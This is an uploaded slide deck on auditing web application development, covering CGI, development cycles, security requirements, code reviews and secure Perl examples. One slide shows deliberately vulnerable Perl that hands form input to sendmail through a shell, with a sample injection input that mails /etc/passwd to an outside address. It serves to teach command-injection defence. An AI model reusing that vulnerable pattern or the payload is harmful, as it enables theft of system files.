Auditing the Development of Web-Based Applications

Jian Zhen

Uploaded by alaina-joseph, 22-Dec-2015


Overview

Overview of WWW and HTTP
Web-based Application Concepts
Overview of the Development Cycles
Security Requirements
Web-based Application Security
Application Code Reviews

World-Wide-Web (WWW)World-Wide-Web (WWW)

Invented by Tim Berners-Lee and others at the European Laboratory for Particle Physics (CERN)

Based on hypertext, a system of embedding links in text to link to other text

The most popular way of linking to resources on the Internet

WWW (Cont.)

Hundreds of millions of pages indexed by search engines

Tens of terabytes archived by Alexa

Hundreds of millions of users on the Web

WWW and HTTP

Static Web Model (diagram): Web Browser and Web Server
1. Request at port 80; response and close
2. 2nd request; 2nd response and close

Common Gateway Interface (CGI)

Common
• An open specification
• Many languages

Gateway
• Strength is not in what it does by itself
• Methods to access other systems

Interface
• Well defined way to call features

CGI (cont.)

A way of providing dynamic web content
• Forms
• Counters
• Guest Books
• Database Queries

Used by most of the web-based applications

The CGI Model (diagram)

Browser on the desktop -> Internet -> Web Server -> CGI process on the Web Server
1. HTTP request
2. CGI started, input passed to CGI process
3. CGI hands back output
4. Output returns to the browser

Web Applications (diagram)

Browsers:
• Plug-ins
• Applets
• DHTML
• etc

Internet

Server:
• CGI
• Servlets
• ASP
• NSAPI

CORBA/ODBC

Static Pages / Database

Web Applications

Client side
• HTML/DHTML
• JavaScript, VBScript, PerlScript
• Java
• ActiveX
• Plug-ins

Web Applications

Server side
• Frontend: CGIs (Perl, C/C++), Java Servlets, ISAPI, NSAPI, ASP, etc
• Middleware: CORBA, ODBC, DCOM, etc
• Backend: Oracle, Informix, Sybase, DB2, etc

Web Applications

Complex distributed, client/server applications

Many elements involved and integrated

Rapid development

Requires more planning, design, and control than “conventional” projects.

Web Development Cycles (diagram)

Analysis, Design, Prototyping, Testing, Implementation (a cycle)

Web Development Cycles

Analysis
• Feasibility study
• Identify requirements
• Involvement: your requirements

Web Development Cycles

Design
• Design specifications
• Involvement: system interoperability, resiliency, capacity planning, mature technologies, security design

Design Specification

Business Requirement
Existing and Proposed System Overview
Hardware and Software Requirements
System Schematic
System Interoperability
Operational cycle/Workflow
System Modules
Input-Output
User Interface
Prototypes

Web Development Cycles

Prototyping
• Most time-consuming stage
• Coding
• Build, review, and refine prototype
• Involvement: coding standards, effective application development environment

Web Development Cycles

Testing
• Unit/System test plans
• Module/Unit testing
• System integration testing
• Involvement: test plans, effective testing environment, testing stages, code reviews

Web Development Cycles

Delivery/Implementation
• Install systems
• Train users
• Acceptance testing
• Involvement: effective implementation

Security Requirements

Privacy - All user information is protected

Authentication/Access Control - Only authorized users are allowed to access the resources

Integrity - User and application data cannot be tampered with

Auditing - Keeping audit logs and audit trails and ensuring their integrity

Privacy

Protecting users’ private information
• SSN
• Birthdates
• Employee Ids
• Passwords

Technologies
• Encryption: DES, RSA, SSL
• Local vs. Network

Authentication

Proof of Identity

Required to enforce access control and accountability, and achieve non-repudiation

Technologies
• username/password
• Smart Cards, SecurID
• Biometrics

Access Control

Determine who is authorized to receive or modify information

Common mechanisms
• Mandatory Access Control (MAC)
  – Owners cannot modify access list (SeOS)
• Discretionary Access Control (DAC)
  – Owners are allowed to modify access (UNIX)
• Role-based Access Control (RBAC)
  – Role granted provides necessary access

Auditing

The process of collecting and recording security-relevant activities on a system

After-the-fact technique

Audit logs are used as evidence
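An added example, not from the slides, of one way to make an audit trail tamper-evident so that it can serve as evidence after the fact: each record carries a digest chained to the previous record's digest, so an altered or deleted entry breaks verification of everything after it. The record layout is this example's own, and it uses SHA-256 from the core Digest::SHA module rather than the MD5 the slides list under Data Encryption.

```perl
#!/usr/bin/perl
# Added example (not part of the slides): a hash-chained audit trail.
# Each record's digest covers the previous digest and its own fields, so
# editing or removing an earlier record invalidates every later one.
use strict;
use warnings;
use Digest::SHA qw(sha256_hex);   # core module; SHA-256 chosen over MD5

my $GENESIS = '0' x 64;            # digest assumed "before" the first record
my @FIELDS  = qw(time user action result);

# Escape tab, newline and backslash so one record is always one line.
sub escape_field {
    my ($v) = @_;
    $v = '' unless defined $v;
    $v =~ s/([\\\t\n])/sprintf('\\x%02x', ord $1)/ge;
    return $v;
}

# Append one record to @$log and return its digest.
sub audit_append {
    my ($log, %rec) = @_;
    my $prev   = @$log ? (split /\t/, $log->[-1])[-1] : $GENESIS;
    my @fields = map { escape_field($rec{$_}) } @FIELDS;
    my $digest = sha256_hex(join("\t", $prev, @fields));
    push @$log, join("\t", @fields, $digest);
    return $digest;
}

# Re-walk the chain. Returns 0 if every record matches its predecessor,
# otherwise the 1-based index of the first record that does not.
sub audit_verify {
    my ($log) = @_;
    my $prev = $GENESIS;
    for my $i (0 .. $#$log) {
        my @parts  = split /\t/, $log->[$i], -1;
        my $digest = pop @parts;
        return $i + 1
            unless @parts == @FIELDS
                && $digest eq sha256_hex(join("\t", $prev, @parts));
        $prev = $digest;
    }
    return 0;
}

# Constructed demonstration: build a trail, verify it, then alter one
# record (as someone covering their tracks would) and verify again.
unless (caller) {
    my @log;
    audit_append(\@log, time => '2015-12-22T10:00:00Z', user => 'alice',
                 action => 'login', result => 'ok');
    audit_append(\@log, time => '2015-12-22T10:01:00Z', user => 'alice',
                 action => 'view record 42', result => 'ok');
    audit_append(\@log, time => '2015-12-22T10:02:00Z', user => 'alice',
                 action => 'logout', result => 'ok');
    printf "intact trail: first bad record = %d\n", audit_verify(\@log);

    $log[1] =~ s/view record 42/view record 41/;
    printf "edited record 2: first bad record = %d\n", audit_verify(\@log);

    splice @log, 1, 1;    # delete record 2 instead of editing it
    printf "record deleted: first bad record = %d\n", audit_verify(\@log);
}
```

The chain only detects tampering; it does not prevent it. For the log to count as evidence, the latest digest still has to be anchored somewhere the application cannot rewrite (a separate host, or a signature by a key the web server does not hold), since whoever can rewrite every record can recompute every digest.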

Data Encryption

Confidentiality
• Scrambling data to unreadable format

Integrity
• User and application data are not modified

Technologies
• Public/Secret Key Encryption: RSA, DES
• Digital Signatures: DSS
• Hashes: MD5

Web-based Application Security

Security flaws occur when software bugs allow violation of security policy

Different security flaws present different threats
• Opening backdoors
• Stealing information or system resources
• Destroying or tampering with data

Where Do Flaws Exist?

Operating Systems
• UNIX, NT

Support Software and Libraries
• Compilers, C Libraries

Applications
• CGI programs, Netscape, Internet Explorer, vi, Emacs, Sendmail, many others

Web-based Application Security

Different layers of security
• Network security
• Operating System security
• Web server security
• Application security

MUST PROTECT ALL LAYERS!!!
• Rootshell gets defaced!

Web-based Application Security

Common Security Flaws
• Insufficient Input Validations
• Memory Cleansing, i.e. Cookie deletion on the client
• Environmental Faults
• Buffer Overflows
• Race Conditions

Web-based Application Security

CGI Programming Example

What if we used this Perl code to send mail to an address given in a fill-out form?

    $mail_to = &get_name_from_input;   # read the address
    open (MAIL, "| /usr/lib/sendmail $mail_to");
    print MAIL "To: $mail_to\nFrom: me\n\nHello\n";
    close MAIL;

CGI Example (cont.)

Look at the open() call:

    open (MAIL, "| /usr/lib/sendmail $mail_to");

What if the user entered

    [email protected];mail [email protected]</etc/passwd;

Look at the open again!

    /usr/lib/sendmail [email protected]; mail [email protected]</etc/passwd;

Web-based Application Security

Never Assume That:
• The input to a field from a selection list will be one of the items on the list
• A browser will never send more than the maximum length of an input field
• The fields in the QUERY_STRING variable will match the ones on the page
• The QUERY_STRING variable will correspond to something that is within valid HTTP specs
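An added example, not from the slides, of a CGI input reader that treats each of the four assumptions above as something to check rather than trust. The form fields, the allowlisted values and the length limits are this example's own constructed choices, and its character allowlist for the query string is deliberately narrower than what HTTP permits.

```perl
#!/usr/bin/perl
# Added example (not part of the slides): a CGI input reader that checks
# every "Never assume" point instead of trusting the browser.
use strict;
use warnings;

# Constructed form description: a selection list with fixed values and a
# free-text field with a length cap and a character pattern.
my %FORM_SPEC = (
    color => { values => [qw(red green blue)] },
    name  => { maxlen => 40, pattern => qr/\A[A-Za-z .'-]+\z/ },
);
my $MAX_QUERY_LEN = 1024;    # cap on the whole QUERY_STRING

# Decode one application/x-www-form-urlencoded component.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Parse and validate QUERY_STRING. Returns ({field => value}, undef) on
# success, or (undef, "reason") at the first violation.
sub parse_query {
    my ($query) = @_;
    $query = '' unless defined $query;

    # The browser's maxlength attribute binds nothing; the server must.
    return (undef, 'query string too long')
        if length($query) > $MAX_QUERY_LEN;

    # Strict allowlist of characters for this form (narrower than HTTP
    # allows); anything else is rejected rather than guessed at.
    return (undef, 'query string is not well-formed form data')
        if $query =~ /[^A-Za-z0-9\-._~%+=&]/;

    my %out;
    for my $pair (grep { length } split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        $v = '' unless defined $v;
        $k = url_decode($k);
        $v = url_decode($v);

        # Field names may not match the ones on the page.
        my $spec = $FORM_SPEC{$k}
            or return (undef, "unexpected field '$k'");
        return (undef, "duplicate field '$k'") if exists $out{$k};

        if ($spec->{values}) {
            # A selection-list value may not be one of the list items.
            return (undef, "value for '$k' is not in the selection list")
                unless grep { $_ eq $v } @{ $spec->{values} };
        }
        else {
            return (undef, "field '$k' too long")
                if length($v) > $spec->{maxlen};
            return (undef, "field '$k' contains disallowed characters")
                unless $v =~ $spec->{pattern};
        }
        $out{$k} = $v;
    }
    return (\%out, undef);
}

# When run as a CGI program: input arrives in the environment (step 2 of
# the CGI model), output goes back on stdout (step 3).
unless (caller) {
    my ($fields, $err) = parse_query($ENV{QUERY_STRING});
    if ($err) {
        print "Status: 400 Bad Request\r\nContent-Type: text/plain\r\n\r\n";
        print "Rejected input: $err\n";
    }
    else {
        print "Content-Type: text/plain\r\n\r\n";
        print "$_: $fields->{$_}\n" for sort keys %$fields;
    }
}
```

Run it under a web server as a CGI, or from a shell with QUERY_STRING set in the environment (for example `QUERY_STRING='color=red&name=Jane' perl input.cgi`). Every rejection names the failed check, which is what the error log needs when reviewing it later; the client only ever sees a 400.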

Web-based Application Security

AVOID shell programming!

Always use full pathnames for both commands and filenames, or explicitly set the PATH variable

Don’t depend on the current directory

Use and check all return codes from system calls
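The slides' sendmail call, shown as an added example (not the slides' own code) first as written and then rewritten to follow the advice above: the recipient is checked against an allowlist pattern, sendmail is run by full pathname with no shell in between, PATH is set explicitly, and every return code is checked. The sendmail path, the `-i` flag and the address pattern are this example's assumptions.

```perl
#!/usr/bin/perl
# Added example (not part of the slides): the slide's sendmail CGI code
# as written, beside a version that follows the slide's own advice.
use strict;
use warnings;

# The slide's version. The two-argument open hands the whole string to
# /bin/sh, so ';', '<' and '|' in $mail_to become shell syntax. Kept only
# for contrast and never called with request data here.
sub send_mail_unsafe {
    my ($mail_to) = @_;
    open(my $mail, "| /usr/lib/sendmail $mail_to") or die "sendmail: $!";
    print $mail "To: $mail_to\nFrom: me\n\nHello\n";
    close $mail;
}

# Hardened version (assumed path; adjust for the platform).
my $SENDMAIL = '/usr/lib/sendmail';         # full pathname, not found via PATH
$ENV{PATH} = '/usr/bin:/bin';               # explicit PATH for any child
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # variables that steer a shell

# Allowlist: local part, '@', dotted hostname, nothing else. Shell
# metacharacters, whitespace and newlines (header injection) all fail here,
# and a leading '-' is excluded so the address can never look like an option.
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._%+-]*\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/ ? 1 : 0;
}

# Returns 1 when sendmail accepted the message, 0 otherwise; the reason
# goes to the error log (stderr) instead of to the client.
sub send_mail_safe {
    my ($mail_to) = @_;
    unless (valid_address($mail_to)) {
        warn 'rejected recipient: ' . (defined $mail_to ? "'$mail_to'" : 'undef') . "\n";
        return 0;
    }
    # List-form open: Perl execs $SENDMAIL with a separate argv entry for
    # the address, so no shell ever parses it. '-i' stops a lone '.' line
    # from ending the message early.
    open(my $mail, '|-', $SENDMAIL, '-i', $mail_to)
        or do { warn "cannot run $SENDMAIL: $!\n"; return 0 };
    unless (print $mail "To: $mail_to\nFrom: me\n\nHello\n") {
        warn "write to sendmail failed: $!\n";
        close $mail;
        return 0;
    }
    # close() on a pipe is false if the child exited non-zero ($?) or the
    # close itself failed ($!); the slide says to check every return code.
    unless (close $mail) {
        my $why = $! ? "closing sendmail pipe: $!\n"
                     : sprintf("sendmail exited with status %d\n", $? >> 8);
        warn $why;
        return 0;
    }
    return 1;
}

# Stand-alone check of the validator with constructed inputs; nothing is
# sent. The second string has the shape of the slide's attack input.
unless (caller) {
    for my $addr ('jane@example.com',
                  'jane@example.com;mail joe@example.com</etc/passwd;',
                  "jane\@example.com\nBcc: joe\@example.com") {
        (my $shown = $addr) =~ s/\n/\\n/g;
        printf "%-60s %s\n", $shown, valid_address($addr) ? 'accepted' : 'rejected';
    }
}
```

The list-form open is the decisive change: with the shell gone, the only remaining question is whether sendmail itself will misread the argument, which the pattern settles by rejecting anything that is not a plain address. The validation is an allowlist, not a list of known bad characters, so a metacharacter the author did not think of is still rejected.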

Web-based Application Security

Have internal consistency checking code

Include lots of logging

Review publicly available programs

Review error logs

Make the critical portion of the program as simple as possible

Read through the code

Code Reviews (diagram)

Code Inspection, Walk Through, Code Reading (from most formal to most informal)

Code Reviews

Code Inspection
• Formal code review
• Emphasis on defect detection, not correction
• Reviewers prepare beforehand
• Distinct roles are assigned

Code Reviews

Walkthroughs
• Usually hosted and moderated by the author of the design or code under review
• To improve the technical quality of a program
• Emphasis on error detection

Code Reviews

Code Reading
• Read source code and look for errors
• Comment on design, style, readability, maintainability, and efficiency
• Informal meetings
• Probably most common in web-based application environments

Appendix

The Ten Commandments for C Programmers

Thou shalt run lint frequently and study its pronouncements with care, for verily its perception and judgement oft exceed thine.

Thou shalt not follow the NULL pointer, for chaos and madness await thee at its end.

The Ten Commandments for C Programmers (cont.)

Thou shalt cast all function arguments to the expected type if they are not of that type already, even when thou art convinced that this is unnecessary, lest they take cruel vengeance upon thee when thou least expect it.

If thy header files fail to declare the return types of thy library functions, thou shalt declare them thyself with the most meticulous care, lest grievous harm befall thy program.

The Ten Commandments for C Programmers (cont.)

Thou shalt check the array bounds of all strings (indeed, all arrays), for surely where thou typest “foo” someone someday shall type “supercalifragilisticexpialidocious.”

If a function be advertised to return an error code in the event of difficulties, thou shalt check for that code, yea, even though the checks triple the size of thy code and produce aches in thy typing fingers, for if thou thinkest “it cannot happen to me,” the gods shall surely punish thee for thy arrogance.

The Ten Commandments for C Programmers (cont.)

Thou shalt study thy libraries and strive not to re-invent them without cause, that thy code may be short and readable and thy days pleasant and productive.

Thou shalt make thy program’s purpose and structure clear to thy fellow man by using the One True Brace Style, even if thou likest it not, for thy creativity is better used in solving problems than in creating beautiful new impediments to understanding.

The Ten Commandments for C Programmers (cont.)

Thy external identifiers shall be unique in the first six characters, though this harsh discipline be irksome and the years of its necessity stretch before thee seemingly without end, lest thou tear thy hair out and go mad on that fateful day when thou desirest to make thy program run on an old system.

Thou shalt foreswear, renounce, and abjure the vile heresy which claimeth that “All the world’s a VAX,” and have no commerce with the benighted heathens who cling to this barbarous belief, that the days of thy program may be long even though the days of thy current machine be short.